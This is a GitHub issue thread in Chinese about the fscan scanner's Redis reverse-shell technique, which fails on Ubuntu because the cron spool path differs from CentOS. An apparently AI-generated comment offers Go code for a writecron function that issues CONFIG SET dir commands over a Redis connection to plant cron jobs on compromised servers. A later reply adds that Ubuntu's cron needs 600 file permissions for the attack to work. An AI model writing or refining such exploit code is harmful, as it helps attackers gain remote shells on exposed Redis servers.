### ISSUE TITLE
关于redis反弹shell

### ISSUE THREAD

**Issue by RuoJi6** [shadow1ng/fscan#334]
乌班图redis系统反弹shell，出现
CONFIG SET dir /var/spool/cron/
-ERR Changing directory: No such file or directory
Centos是/var/spool/cron/用户名
Ubuntu是/var/spool/cron/crontabs/用户名

**Comment by DevBuddyConnor** [comment]
针对Issue [#334](https://github.com/shadow1ng/fscan/issues/334) 关于redis反弹shell在Ubuntu系统中的路径问题，以下是一些建议的代码修改方式，以适应不同操作系统的路径差异问题。建议在`writecron`函数中增加操作系统路径的检测和相应的处理逻辑。

```go
func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
    flag = false
    // 尝试写入Ubuntu的路径
    _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n"))
    if err != nil {
        return flag, text, err
    }
    text, err = readreply(conn)
    if strings.Contains(text, "OK") {
        // 如果返回了"OK"，说明Ubuntu路径可用，接下来我们可以尝试写入cron
    } else {
        // 如果没有返回"OK"，可能是CentOS，尝试CentOS的路径
        _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/\r\n"))
        if err != nil {
            return flag, text, err
        }
        text, err = readreply(conn)
        if !strings.Contains(text, "OK") {
            return flag, text, err // 如果还是不行，直接返回错误
        }
    }

    // 接下来的代码与原函数相同，执行写入cron操作...
}
```

注意，以上代码为示例用途，它演示了如何尝试使用不同的路径。在实际修改时，可能还需要进一步根据项目的具体要求和逻辑来调整代码。这保证了我们的实现能够更灵活地处理不同操作系统间的差异问题。

**[注意]** 该Comment由AI生成，仅供参考。

**Comment by XiaoliChan** [comment]
@shadow1ng Commit: https://github.com/shadow1ng/fscan/commit/15f3864db2480ac0cf898da5d17d08205de2e0dd 存在问题

Ubuntu只认`permission 600`，而写入的计划任务文件为644

Reference: 
- https://www.svenbeast.com/post/g2K6Xk3IG/
